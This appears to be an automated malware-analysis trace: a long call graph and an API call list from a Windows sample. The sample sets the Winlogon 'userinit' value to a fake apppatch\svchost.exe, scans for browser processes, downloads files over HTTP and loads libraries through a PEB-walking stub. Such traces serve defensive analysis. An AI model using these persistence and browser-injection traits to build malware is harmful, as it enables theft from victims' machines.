81474->81475 81476 2c96e90 8 API calls 81475->81476 81477 2c96330 81476->81477 81478 2c96e90 8 API calls 81477->81478 81479 2c96344 81478->81479 81480 2c96e90 8 API calls 81479->81480 81481 2c96358 81480->81481 81482 2c96e90 8 API calls 81481->81482 81483 2c9636c 81482->81483 81484 2c96e90 8 API calls 81483->81484 81485 2c96380 81484->81485 81486 2c96e90 8 API calls 81485->81486 81487 2c96394 81486->81487 81488 2c96e90 8 API calls 81487->81488 81489 2c963a8 81488->81489 81490 2c96e90 8 API calls 81489->81490 81491 2c963bc 81490->81491 81492 2c96e90 8 API calls 81491->81492 81493 2c963d0 81492->81493 81494 2c96e90 8 API calls 81493->81494 81495 2c963e4 81494->81495 81496 2c96e90 8 API calls 81495->81496 81497 2c963fa 81496->81497 81498 2c96e90 8 API calls 81497->81498 81499 2c9640e 81498->81499 81500 2c96e90 8 API calls 81499->81500 81501 2c96424 81500->81501 81502 2c9643a 81501->81502 81503 2c96e90 8 API calls 81501->81503 81504 2c9643f 81502->81504 81505 2c96e90 8 API calls 81502->81505 81503->81502 81504->81400 81504->81401 81505->81504 81507 2c973e8 memset 81506->81507 81508 2c973fc 81506->81508 81574 2c94270 17 API calls 81507->81574 81556 2c95870 81508->81556 81513 2c97484 GetProcessHeap HeapValidate 81515 2c974ab GetProcessHeap RtlFreeHeap 81513->81515 81516 2c974b6 81513->81516 81515->81516 81516->81406 81518 2c9735a 81517->81518 81519 2c97385 81517->81519 81518->81519 81520 2c97362 GetHandleInformation 81518->81520 81519->81383 81519->81414 81519->81415 81520->81519 81521 2c97378 81520->81521 81521->81519 81522 2c9737e CloseHandle 81521->81522 81522->81519 81524 2c96fb0 81523->81524 81525 2c96fa6 81523->81525 81526 2c96fb6 81524->81526 81527 2c96fd1 SetFilePointer 81524->81527 81525->81419 81526->81419 81527->81419 81529 2c97159 81528->81529 81530 2c971ff 81528->81530 81529->81530 81531 2c97162 GetFileType 81529->81531 81530->81390 81532 2c9716e 81531->81532 81533 2c971a0 GetLocalTime SystemTimeToFileTime FileTimeToDosDateTime 81531->81533 81636 2c96c70 
GetFileType 81532->81636 81533->81390 81535 2c97183 81535->81530 81536 2c97187 SetFilePointer 81535->81536 81536->81390 81537->81390 81538->81406 81539->81427 81540->81423 81542 2c96ea3 81541->81542 81543 2c96f64 81541->81543 81546 2c96f42 memcpy 81542->81546 81547 2c96ebf CreateFileMappingA 81542->81547 81544 2c96f6a WriteFile 81543->81544 81545 2c96f90 81543->81545 81544->81443 81545->81443 81546->81443 81549 2c96eff 81547->81549 81550 2c96ee3 MapViewOfFile 81547->81550 81549->81443 81551 2c96efa 81550->81551 81552 2c96f0d memcpy UnmapViewOfFile 81550->81552 81554 2c93e00 2 API calls 81551->81554 81553 2c93e00 2 API calls 81552->81553 81555 2c96f30 81553->81555 81554->81549 81555->81546 81557 2c95882 memset 81556->81557 81559 2c95908 81557->81559 81563 2c97290 2 API calls 81559->81563 81560 2c9595c 81564 2c95ee0 81560->81564 81561 2c9593b 81561->81560 81575 2c95b50 memcpy memcpy ReadFile 81561->81575 81563->81561 81565 2c95f03 81564->81565 81573 2c95f0e 81564->81573 81596 2c95c90 12 API calls 81565->81596 81567 2c9617f 81576 2c94fe0 81567->81576 81568 2c95f08 81568->81513 81572 2c94fe0 9 API calls 81572->81573 81573->81567 81573->81572 81597 2c95b50 memcpy memcpy ReadFile 81573->81597 81574->81508 81575->81560 81577 2c9500d 81576->81577 81578 2c950a0 81577->81578 81579 2c95067 81577->81579 81580 2c950e1 81578->81580 81581 2c950a6 81578->81581 81583 2c95580 8 API calls 81579->81583 81598 2c95580 81580->81598 81584 2c95580 8 API calls 81581->81584 81586 2c9506f 81583->81586 81587 2c950af 81584->81587 81626 2c95730 9 API calls 81586->81626 81590 2c95390 8 API calls 81587->81590 81593 2c9509b 81590->81593 81594 2c9516c 81593->81594 81622 2c95640 81593->81622 81594->81513 81596->81568 81597->81573 81599 2c9558f 81598->81599 81600 2c950ea 81599->81600 81627 2c96e60 81599->81627 81602 2c94f10 81600->81602 81603 2c94f27 81602->81603 81604 2c95580 8 API calls 81603->81604 81605 2c94f63 81604->81605 81606 2c95580 8 API calls 81605->81606 81607 2c94f71 81606->81607 81608 
2c95580 8 API calls 81607->81608 81609 2c94f7c 81608->81609 81610 2c94fac 81609->81610 81612 2c95580 8 API calls 81609->81612 81632 2c94ce0 81610->81632 81612->81609 81614 2c94ce0 8 API calls 81615 2c94fce 81614->81615 81616 2c95390 81615->81616 81619 2c954a9 81616->81619 81620 2c953ae 81616->81620 81617 2c95580 8 API calls 81618 2c954c2 81617->81618 81618->81593 81619->81617 81620->81619 81621 2c95580 8 API calls 81620->81621 81621->81620 81623 2c9564c 81622->81623 81624 2c95703 81623->81624 81625 2c96e60 8 API calls 81623->81625 81624->81594 81625->81624 81626->81593 81628 2c96e6d 81627->81628 81629 2c96e72 81627->81629 81628->81600 81630 2c96e90 8 API calls 81629->81630 81631 2c96e7f 81630->81631 81631->81600 81633 2c94d05 81632->81633 81634 2c94e35 81633->81634 81635 2c95580 8 API calls 81633->81635 81634->81614 81635->81633 81637 2c96c91 GetFileInformationByHandle 81636->81637 81638 2c96c84 81636->81638 81639 2c96cad GetSystemTime GetLocalTime SystemTimeToFileTime SystemTimeToFileTime 81637->81639 81640 2c96ca0 81637->81640 81638->81535 81641 2c96d05 GetFileSize 81639->81641 81640->81535 81643 2c96d6e SetFilePointer ReadFile SetFilePointer ReadFile 81641->81643 81646 2c96dfd 81641->81646 81644 2c96db5 81643->81644 81643->81646 81645 2c96dc0 SetFilePointer ReadFile 81644->81645 81644->81646 81647 2c96de1 81645->81647 81648 2c96e2d FileTimeToDosDateTime 81646->81648 81649 2c96e4e 81646->81649 81647->81646 81648->81649 81649->81535 81651 2c96ffd 81650->81651 81657 2c97003 81650->81657 81665 2c97a50 81651->81665 81652 2c9701d 81655 2c9702b GetHandleInformation 81652->81655 81656 2c9704e 81652->81656 81654 2c97016 UnmapViewOfFile 81654->81652 81655->81656 81658 2c97041 81655->81658 81659 2c97059 GetHandleInformation 81656->81659 81660 2c97086 81656->81660 81657->81652 81657->81654 81658->81656 81661 2c97047 CloseHandle 81658->81661 81662 2c97078 81659->81662 81663 2c9706b 81659->81663 81660->81346 81661->81656 81662->81346 81663->81662 81664 2c97071 CloseHandle 
81663->81664 81664->81662 81666 2c97a78 81665->81666 81673 2c97b04 81665->81673 81669 2c97ab3 GetProcessHeap HeapValidate 81666->81669 81670 2c97ad7 GetProcessHeap HeapValidate 81666->81670 81666->81673 81675 2c965b0 81666->81675 81669->81670 81671 2c97ac7 GetProcessHeap HeapFree 81669->81671 81670->81666 81672 2c97aed GetProcessHeap HeapFree 81670->81672 81671->81670 81672->81666 81674 2c97b24 81673->81674 81774 2c969b0 81673->81774 81674->81657 81676 2c96e90 8 API calls 81675->81676 81677 2c965c5 81676->81677 81678 2c96e90 8 API calls 81677->81678 81679 2c965d6 81678->81679 81680 2c96e90 8 API calls 81679->81680 81681 2c965e7 81680->81681 81682 2c96e90 8 API calls 81681->81682 81683 2c965f8 81682->81683 81684 2c96e90 8 API calls 81683->81684 81685 2c9660b 81684->81685 81686 2c96e90 8 API calls 81685->81686 81687 2c9661f 81686->81687 81688 2c96e90 8 API calls 81687->81688 81689 2c96633 81688->81689 81690 2c96e90 8 API calls 81689->81690 81691 2c96647 81690->81691 81692 2c96e90 8 API calls 81691->81692 81693 2c9665b 81692->81693 81694 2c96e90 8 API calls 81693->81694 81695 2c9666f 81694->81695 81696 2c96e90 8 API calls 81695->81696 81697 2c96683 81696->81697 81698 2c96e90 8 API calls 81697->81698 81699 2c96697 81698->81699 81700 2c96e90 8 API calls 81699->81700 81701 2c966ab 81700->81701 81702 2c96e90 8 API calls 81701->81702 81703 2c966bf 81702->81703 81704 2c96e90 8 API calls 81703->81704 81705 2c966d3 81704->81705 81706 2c96e90 8 API calls 81705->81706 81707 2c966e7 81706->81707 81708 2c96e90 8 API calls 81707->81708 81709 2c966fb 81708->81709 81710 2c96e90 8 API calls 81709->81710 81711 2c9670f 81710->81711 81712 2c96e90 8 API calls 81711->81712 81713 2c96723 81712->81713 81714 2c96e90 8 API calls 81713->81714 81715 2c96737 81714->81715 81716 2c96e90 8 API calls 81715->81716 81717 2c9674b 81716->81717 81718 2c96e90 8 API calls 81717->81718 81719 2c9675f 81718->81719 81720 2c96e90 8 API calls 81719->81720 81721 2c96773 81720->81721 81722 2c96e90 8 API calls 
81721->81722 81723 2c96787 81722->81723 81724 2c96e90 8 API calls 81723->81724 81725 2c9679b 81724->81725 81726 2c96e90 8 API calls 81725->81726 81727 2c967af 81726->81727 81728 2c96e90 8 API calls 81727->81728 81729 2c967c3 81728->81729 81730 2c96e90 8 API calls 81729->81730 81731 2c967d7 81730->81731 81732 2c96e90 8 API calls 81731->81732 81733 2c967eb 81732->81733 81734 2c96e90 8 API calls 81733->81734 81735 2c96801 81734->81735 81736 2c96e90 8 API calls 81735->81736 81737 2c96815 81736->81737 81738 2c96e90 8 API calls 81737->81738 81739 2c9682b 81738->81739 81740 2c96e90 8 API calls 81739->81740 81741 2c9683f 81740->81741 81742 2c96e90 8 API calls 81741->81742 81743 2c96855 81742->81743 81744 2c96e90 8 API calls 81743->81744 81745 2c96869 81744->81745 81746 2c96e90 8 API calls 81745->81746 81747 2c9687d 81746->81747 81748 2c96e90 8 API calls 81747->81748 81749 2c96891 81748->81749 81750 2c96e90 8 API calls 81749->81750 81751 2c968a5 81750->81751 81752 2c96e90 8 API calls 81751->81752 81753 2c968b9 81752->81753 81754 2c96e90 8 API calls 81753->81754 81755 2c968cd 81754->81755 81756 2c96e90 8 API calls 81755->81756 81757 2c968e1 81756->81757 81758 2c96e90 8 API calls 81757->81758 81759 2c968f5 81758->81759 81760 2c96e90 8 API calls 81759->81760 81761 2c96909 81760->81761 81762 2c96e90 8 API calls 81761->81762 81763 2c9691d 81762->81763 81764 2c96e90 8 API calls 81763->81764 81765 2c96931 81764->81765 81766 2c96e90 8 API calls 81765->81766 81767 2c96945 81766->81767 81768 2c9695b 81767->81768 81770 2c96e90 8 API calls 81767->81770 81769 2c96991 81768->81769 81771 2c96976 81768->81771 81772 2c96e90 8 API calls 81768->81772 81769->81666 81770->81768 81771->81769 81773 2c96e90 8 API calls 81771->81773 81772->81771 81773->81769 81775 2c96e90 8 API calls 81774->81775 81776 2c969c9 81775->81776 81777 2c96e90 8 API calls 81776->81777 81778 2c969da 81777->81778 81779 2c96e90 8 API calls 81778->81779 81780 2c969eb 81779->81780 81781 2c96e90 8 API calls 81780->81781 81782 
2c969fc 81781->81782 81783 2c96e90 8 API calls 81782->81783 81784 2c96a0d 81783->81784 81785 2c96e90 8 API calls 81784->81785 81786 2c96a1e 81785->81786 81787 2c96e90 8 API calls 81786->81787 81788 2c96a2f 81787->81788 81789 2c96e90 8 API calls 81788->81789 81790 2c96a40 81789->81790 81791 2c96e90 8 API calls 81790->81791 81792 2c96a53 81791->81792 81793 2c96e90 8 API calls 81792->81793 81794 2c96a6c 81793->81794 81795 2c96e90 8 API calls 81794->81795 81796 2c96a7f 81795->81796 81797 2c96e90 8 API calls 81796->81797 81798 2c96a92 81797->81798 81799 2c96e90 8 API calls 81798->81799 81800 2c96aa5 81799->81800 81801 2c96e90 8 API calls 81800->81801 81802 2c96abb 81801->81802 81803 2c96e90 8 API calls 81802->81803 81804 2c96ad1 81803->81804 81805 2c96e90 8 API calls 81804->81805 81806 2c96ae7 81805->81806 81807 2c96e90 8 API calls 81806->81807 81808 2c96af7 81807->81808 81809 2c96e90 8 API calls 81808->81809 81810 2c96b0c 81809->81810 81811 2c96e90 8 API calls 81810->81811 81812 2c96b21 81811->81812 81813 2c96e90 8 API calls 81812->81813 81814 2c96b34 81813->81814 81815 2c96e90 8 API calls 81814->81815 81816 2c96b45 81815->81816 81817 2c96e90 8 API calls 81816->81817 81818 2c96b56 81817->81818 81818->81674 81820 2c76585 CreateFileA 81819->81820 81821 2c76674 81819->81821 81820->81821 81822 2c765aa GetFileSizeEx 81820->81822 81823 2c7667b IsBadWritePtr 81821->81823 81825 2c7668a 81821->81825 81824 2c765c8 81822->81824 81830 2c76643 81822->81830 81823->81825 81828 2c765d4 GetProcessHeap RtlAllocateHeap 81824->81828 81833 2c765fc 81824->81833 81825->81354 81825->81355 81825->81358 81825->81359 81826 2c76658 GetHandleInformation 81826->81821 81827 2c76667 81826->81827 81827->81821 81831 2c7666d CloseHandle 81827->81831 81832 2c765f0 memset 81828->81832 81828->81833 81829 2c76606 ReadFile 81829->81830 81834 2c76620 GetProcessHeap HeapValidate 81829->81834 81830->81821 81830->81826 81831->81821 81832->81833 81833->81829 81833->81830 81834->81830 81835 2c76633 GetProcessHeap 
HeapFree 81834->81835 81835->81830 81837 2c76384 81836->81837 81838 2c762b9 RegQueryValueExA 81836->81838 81839 2c76392 81837->81839 81840 2c7638b RegCloseKey 81837->81840 81838->81837 81844 2c762e0 81838->81844 81841 2c763a5 81839->81841 81888 2c760e0 memset memset RegOpenKeyExA 81839->81888 81840->81839 81841->81366 81844->81837 81845 2c76343 GetProcessHeap HeapAlloc 81844->81845 81845->81837 81846 2c7635d memset 81845->81846 81846->81837 81847 2c76371 lstrcpynA 81846->81847 81847->81837 81849 2c83d4d 81848->81849 81863 2c83a0b 81848->81863 81850 2c83d7f 81849->81850 81908 2c83620 memset 81849->81908 81850->81365 81851 2c83a71 InternetOpenA 81851->81849 81853 2c83a91 InternetConnectA 81851->81853 81855 2c83ab2 HttpOpenRequestA 81853->81855 81856 2c83d43 InternetCloseHandle 81853->81856 81854 2c83d76 81854->81365 81858 2c83ae8 81855->81858 81859 2c83d39 InternetCloseHandle 81855->81859 81856->81849 81860 2c83b0d HttpAddRequestHeadersA 81858->81860 81864 2c83afe HttpAddRequestHeadersA 81858->81864 81859->81856 81861 2c83b52 HttpSendRequestA 81860->81861 81862 2c83b22 _snprintf HttpAddRequestHeadersA 81860->81862 81865 2c83d2c InternetCloseHandle 81861->81865 81866 2c83b6d HttpQueryInfoA 81861->81866 81862->81861 81863->81849 81863->81851 81864->81860 81865->81859 81866->81865 81867 2c83b8d 81866->81867 81867->81865 81868 2c83b9a CreateFileA 81867->81868 81868->81865 81869 2c83bc4 81868->81869 81870 2c83bd0 GetProcessHeap RtlAllocateHeap 81869->81870 81871 2c83bea memset InternetReadFile 81870->81871 81872 2c83c73 81870->81872 81875 2c83c19 81871->81875 81876 2c83c57 GetProcessHeap HeapValidate 81871->81876 81873 2c83c9a 81872->81873 81874 2c83c77 GetHandleInformation 81872->81874 81879 2c76570 13 API calls 81873->81879 81874->81873 81878 2c83c8d 81874->81878 81875->81876 81880 2c83c20 WriteFile GetProcessHeap HeapValidate 81875->81880 81876->81872 81877 2c83c67 GetProcessHeap HeapFree 81876->81877 81877->81872 81878->81873 81881 2c83c93 CloseHandle 81878->81881 
81884 2c83ca8 81879->81884 81880->81870 81882 2c83c46 GetProcessHeap HeapFree 81880->81882 81881->81873 81882->81870 81883 2c83d29 81883->81865 81884->81883 81897 2c764d0 81884->81897 81886 2c83d0d GetProcessHeap HeapValidate 81886->81883 81887 2c83d1d GetProcessHeap RtlFreeHeap 81886->81887 81887->81883 81889 2c76224 81888->81889 81890 2c76158 RegQueryValueExA 81888->81890 81891 2c76232 81889->81891 81892 2c7622b RegCloseKey 81889->81892 81890->81889 81893 2c7617f 81890->81893 81891->81366 81892->81891 81893->81889 81894 2c761e3 GetProcessHeap HeapAlloc 81893->81894 81894->81889 81895 2c761fd memset 81894->81895 81895->81889 81896 2c76211 lstrcpynA 81895->81896 81896->81889 81898 2c76562 81897->81898 81899 2c764e2 81897->81899 81898->81886 81899->81898 81900 2c764eb CreateFileA 81899->81900 81901 2c7650a WriteFile 81900->81901 81902 2c76559 81900->81902 81903 2c76522 SetEndOfFile 81901->81903 81904 2c7652d 81901->81904 81902->81886 81903->81904 81904->81902 81905 2c7653d GetHandleInformation 81904->81905 81905->81902 81906 2c7654c 81905->81906 81906->81902 81907 2c76552 CloseHandle 81906->81907 81907->81902 81909 2c839a2 81908->81909 81922 2c8366b 81908->81922 81909->81854 81910 2c836d1 InternetOpenA 81911 2c839ad 81910->81911 81912 2c836f4 InternetConnectA 81910->81912 81911->81854 81913 2c8398f InternetCloseHandle 81912->81913 81914 2c83712 HttpOpenRequestA 81912->81914 81913->81854 81916 2c83744 81914->81916 81917 2c83985 InternetCloseHandle 81914->81917 81918 2c83764 HttpAddRequestHeadersA 81916->81918 81919 2c83755 HttpAddRequestHeadersA 81916->81919 81917->81913 81920 2c837a8 HttpSendRequestA 81918->81920 81921 2c83778 _snprintf HttpAddRequestHeadersA 81918->81921 81919->81918 81923 2c8397b InternetCloseHandle 81920->81923 81924 2c837c1 HttpQueryInfoA 81920->81924 81921->81920 81922->81909 81922->81910 81923->81917 81924->81923 81925 2c837e1 81924->81925 81925->81923 81926 2c837ee CreateFileA 81925->81926 81926->81923 81927 2c8381a 81926->81927 81928 2c83820 
GetProcessHeap HeapAlloc 81927->81928 81929 2c8383a memset InternetReadFile 81928->81929 81930 2c838c3 81928->81930 81931 2c83869 81929->81931 81932 2c838a7 GetProcessHeap HeapValidate 81929->81932 81933 2c838ea 81930->81933 81934 2c838c7 GetHandleInformation 81930->81934 81931->81932 81937 2c83870 WriteFile GetProcessHeap HeapValidate 81931->81937 81932->81930 81938 2c838b7 GetProcessHeap HeapFree 81932->81938 81936 2c76570 13 API calls 81933->81936 81934->81933 81935 2c838dd 81934->81935 81935->81933 81939 2c838e3 CloseHandle 81935->81939 81942 2c838fa 81936->81942 81937->81928 81940 2c83896 GetProcessHeap HeapFree 81937->81940 81938->81930 81939->81933 81940->81928 81941 2c83978 81941->81923 81942->81941 81943 2c764d0 5 API calls 81942->81943 81944 2c8395c GetProcessHeap HeapValidate 81943->81944 81944->81941 81945 2c8396c GetProcessHeap HeapFree 81944->81945 81945->81941 81946 2c76a30 NtQuerySystemInformation 81947 2c76a5f GetCurrentProcessId 81946->81947 81952 2c76b39 81946->81952 81955 2c92e00 OpenProcess 81947->81955 81950 2c76a6e GetCurrentThreadId GetThreadDesktop GetUserObjectInformationA 81951 2c76a98 lstrcmpiA 81950->81951 81954 2c76ab2 81950->81954 81951->81952 81951->81954 81953 2c76ad0 memset _snprintf OpenMutexA 81953->81954 81954->81952 81954->81953 81956 2c76a6a 81955->81956 81957 2c92e25 OpenProcessToken 81955->81957 81956->81950 81956->81954 81958 2c92e3a GetTokenInformation 81957->81958 81959 2c92ed2 GetHandleInformation 81957->81959 81961 2c92e54 CharUpperA 81958->81961 81962 2c92e82 81958->81962 81959->81956 81960 2c92ee8 81959->81960 81960->81956 81964 2c92eee CloseHandle 81960->81964 81965 2c92e70 81961->81965 81962->81959 81963 2c92eb6 GetHandleInformation 81962->81963 81963->81959 81967 2c92ec5 81963->81967 81964->81956 81965->81962 81966 2c92e84 CharUpperA 81965->81966 81966->81962 81967->81959 81968 2c92ecb CloseHandle 81967->81968 81968->81959 81969 29a1360 82011 29a11d0 81969->82011 81971 29a136f GetPEB 81972 29a1090 GetPEB 
81971->81972 81973 29a1394 81972->81973 81974 29a1000 GetPEB 81973->81974 81975 29a13a0 81974->81975 81976 29a1090 GetPEB 81975->81976 81977 29a13a6 81976->81977 81978 29a1619 81977->81978 81979 29a13bc GetPEB 81977->81979 81980 29a1000 GetPEB 81978->81980 81981 29a1090 GetPEB 81979->81981 81982 29a1625 81980->81982 81985 29a13d8 81981->81985 81983 29a1090 GetPEB 81982->81983 81984 29a162b 81983->81984 81985->81978 81986 29a1000 GetPEB 81985->81986 81987 29a141b 81986->81987 81988 29a1090 GetPEB 81987->81988 81989 29a1421 81988->81989 81990 29a1000 GetPEB 81989->81990 81991 29a1441 81990->81991 81992 29a1090 GetPEB 81991->81992 81993 29a1447 VirtualAlloc 81992->81993 81993->81978 81999 29a1460 81993->81999 81994 29a158c 81995 29a1000 GetPEB 81994->81995 81996 29a15bd 81995->81996 81997 29a1090 GetPEB 81996->81997 81998 29a15c3 81997->81998 82000 29a12c0 GetPEB 81998->82000 81999->81994 82002 29a1090 GetPEB 81999->82002 82005 29a1000 GetPEB 81999->82005 82009 29a1090 GetPEB 81999->82009 82001 29a15de 82000->82001 82001->81978 82004 29a1000 GetPEB 82001->82004 82003 29a150f LoadLibraryExA 82002->82003 82003->81999 82006 29a1608 82004->82006 82005->81999 82007 29a1090 GetPEB 82006->82007 82008 29a160e 82007->82008 82010 2c86290 2063 API calls 82008->82010 82009->81999 82010->81978 82013 29a11d5 82011->82013
APIs
  • Part of subcall function 02C73310: IsUserAnAdmin.SHELL32 ref: 02C73335
  • Part of subcall function 02C73310: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02C73354
  • Part of subcall function 02C73310: PathAddBackslashA.SHLWAPI(?), ref: 02C73361
  • Part of subcall function 02C73310: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02C7337E
  • Part of subcall function 02C73310: _snprintf.MSVCRT ref: 02C73399
  • Part of subcall function 02C73310: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02C733B7
  • Part of subcall function 02C73310: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02C7340C
  • Part of subcall function 02C73310: RegCloseKey.ADVAPI32(00000000), ref: 02C7341A
  • Part of subcall function 02C93E40: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02C93E6F
  • Part of subcall function 02C93E40: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02C93EA8
  • Part of subcall function 02C93E40: _snprintf.MSVCRT ref: 02C93F13
• SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02C858B0
• PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02C858BB
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02C858CF
• StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C858EB
• GetCommandLineA.KERNEL32 ref: 02C858F5
• GetCommandLineW.KERNEL32 ref: 02C8592D
• InitializeCriticalSection.KERNEL32(02CBD888), ref: 02C8595C
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02C85979
• CreateThread.KERNEL32(00000000,00000000,02C82140,00000000,00000000,00000000), ref: 02C859B7
• GetHandleInformation.KERNEL32(00000000,?), ref: 02C859CF
• CloseHandle.KERNEL32(00000000), ref: 02C859E0
• CreateThread.KERNEL32(00000000,00000000,02C868B0,00000000,00000000,00000000), ref: 02C85A0F
• GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A27
• CloseHandle.KERNEL32(00000000), ref: 02C85A38
• CreateThread.KERNEL32(00000000,00000000,Function_00016B60,00000000,00000000,00000000), ref: 02C85A4D
• CreateMutexA.KERNEL32(00000000,00000000,92F35F00a), ref: 02C85A61
• InitializeCriticalSection.KERNEL32(02CBD8A0), ref: 02C85A70
• CreateThread.KERNEL32(00000000,00000000,02C864A0,00000000,00000000,00000000), ref: 02C85A84
• GetHandleInformation.KERNEL32(00000000,?), ref: 02C85A94
• CloseHandle.KERNEL32(00000000), ref: 02C85AA5
• CreateThread.KERNEL32(00000000,00000000,02C85590,00000000,00000000,00000000), ref: 02C85ABA
• GetHandleInformation.KERNEL32(00000000,?), ref: 02C85ACA
• CloseHandle.KERNEL32(00000000), ref: 02C85ADB
• CreateThread.KERNEL32(00000000,00000000,02C842C0,00000000,00000000,00000000), ref: 02C85B05
• GetHandleInformation.KERNEL32(00000000,?), ref: 02C85B19
• CloseHandle.KERNEL32(00000000), ref: 02C85B2A
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B39
• HeapValidate.KERNEL32(00000000), ref: 02C85B3C
• GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85B49
• HeapFree.KERNEL32(00000000), ref: 02C85B4C
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C85B70
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C85B82
  • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76271
  • Part of subcall function 02C76240: memset.MSVCRT ref: 02C7628F
  • Part of subcall function 02C76240: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C762AB
  • Part of subcall function 02C76240: RegQueryValueExA.KERNEL32(?,92F358B2a,00000000,00000001,?,00000104), ref: 02C762D2
  • Part of subcall function 02C76240: GetProcessHeap.KERNEL32(00000008,00000110,?,?), ref: 02C7634A
  • Part of subcall function 02C76240: HeapAlloc.KERNEL32(00000000), ref: 02C76351
  • Part of subcall function 02C76240: memset.MSVCRT ref: 02C76365
  • Part of subcall function 02C76240: lstrcpynA.KERNEL32(00000000,00000000,00000104), ref: 02C7637E
  • Part of subcall function 02C76240: RegCloseKey.ADVAPI32(?), ref: 02C7638C
• GetCurrentProcess.KERNEL32(00000000), ref: 02C85B8E
• IsUserAnAdmin.SHELL32 ref: 02C85B9D
• StrStrIA.SHLWAPI(?,\svchost.exe), ref: 02C85BB9
• StrStrIA.SHLWAPI(?,\iexplore.exe), ref: 02C85BE0
• StrStrIA.SHLWAPI(?,\java.exe), ref: 02C85BF6
• StrStrIA.SHLWAPI(?,\javaw.exe), ref: 02C85C0C
• StrStrIA.SHLWAPI(?,\javaws.exe), ref: 02C85C22
• StrStrIA.SHLWAPI(?,\opera.exe), ref: 02C85C38
• StrStrIA.SHLWAPI(?,\firefox.exe), ref: 02C85C4E
• StrStrIA.SHLWAPI(?,\maxthon.exe), ref: 02C85C64
• StrStrIA.SHLWAPI(?,\avant.exe), ref: 02C85C7A
• StrStrIA.SHLWAPI(?,\mnp.exe), ref: 02C85C90
• StrStrIA.SHLWAPI(?,\safari.exe), ref: 02C85CA6
• StrStrIA.SHLWAPI(?,\netscape.exe), ref: 02C85CBC
• StrStrIA.SHLWAPI(?,\tbb-firefox.exe), ref: 02C85CD2
• StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02C85CE8
• StrStrIA.SHLWAPI(?,\explorer.exe), ref: 02C85CFE
• CreateThread.KERNEL32(00000000,00000000,02C8A300,00000000,00000000,00000000), ref: 02C85D2C
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D46
• CloseHandle.KERNEL32(00000000), ref: 02C85D53
• CreateThread.KERNEL32(00000000,00000000,02C8D990,00000000,00000000,00000000), ref: 02C85D68
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85D7C
• CloseHandle.KERNEL32(00000000), ref: 02C85D89
• CreateThread.KERNEL32(00000000,00000000,02C8EF40,00000000,00000000,00000000), ref: 02C85D9E
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DB2
• CloseHandle.KERNEL32(00000000), ref: 02C85DBF
• CreateThread.KERNEL32(00000000,00000000,02C8F770,00000000,00000000,00000000), ref: 02C85DD4
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85DE8
• CloseHandle.KERNEL32(00000000), ref: 02C85DF5
• CreateThread.KERNEL32(00000000,00000000,02C8E0B0,00000000,00000000,00000000), ref: 02C85E0A
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E1E
• CloseHandle.KERNEL32(00000000), ref: 02C85E2B
• CreateThread.KERNEL32(00000000,00000000,02C8B580,00000000,00000000,00000000), ref: 02C85E40
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E54
• CloseHandle.KERNEL32(00000000), ref: 02C85E61
• CreateThread.KERNEL32(00000000,00000000,02C8B620,00000000,00000000,00000000), ref: 02C85E76
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85E8A
• CloseHandle.KERNEL32(00000000), ref: 02C85E97
• CreateThread.KERNEL32(00000000,00000000,02C8FEE0,00000000,00000000,00000000), ref: 02C85EAC
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EC0
• CloseHandle.KERNEL32(00000000), ref: 02C85ECD
• CreateThread.KERNEL32(00000000,00000000,02C90AF0,00000000,00000000,00000000), ref: 02C85EE2
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85EF6
• CloseHandle.KERNEL32(00000000), ref: 02C85F03
• CreateThread.KERNEL32(00000000,00000000,02C917E0,00000000,00000000,00000000), ref: 02C85F18
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F2C
• CloseHandle.KERNEL32(00000000), ref: 02C85F39
• CreateThread.KERNEL32(00000000,00000000,02C918D0,00000000,00000000,00000000), ref: 02C85F4E
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F62
• CloseHandle.KERNEL32(00000000), ref: 02C85F6F
• CreateThread.KERNEL32(00000000,00000000,02C8E890,00000000,00000000,00000000), ref: 02C85F84
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85F98
• CloseHandle.KERNEL32(00000000), ref: 02C85FA5
• CreateThread.KERNEL32(00000000,00000000,02C91AB0,00000000,00000000,00000000), ref: 02C85FBA
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C85FCE
• CloseHandle.KERNEL32(00000000), ref: 02C85FDB
• CreateThread.KERNEL32(00000000,00000000,02C92A30,00000000,00000000,00000000), ref: 02C85FF0
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C86004
• CloseHandle.KERNEL32(00000000), ref: 02C86011
• CreateThread.KERNEL32(00000000,00000000,02C92D50,00000000,00000000,00000000), ref: 02C86026
• GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8603A
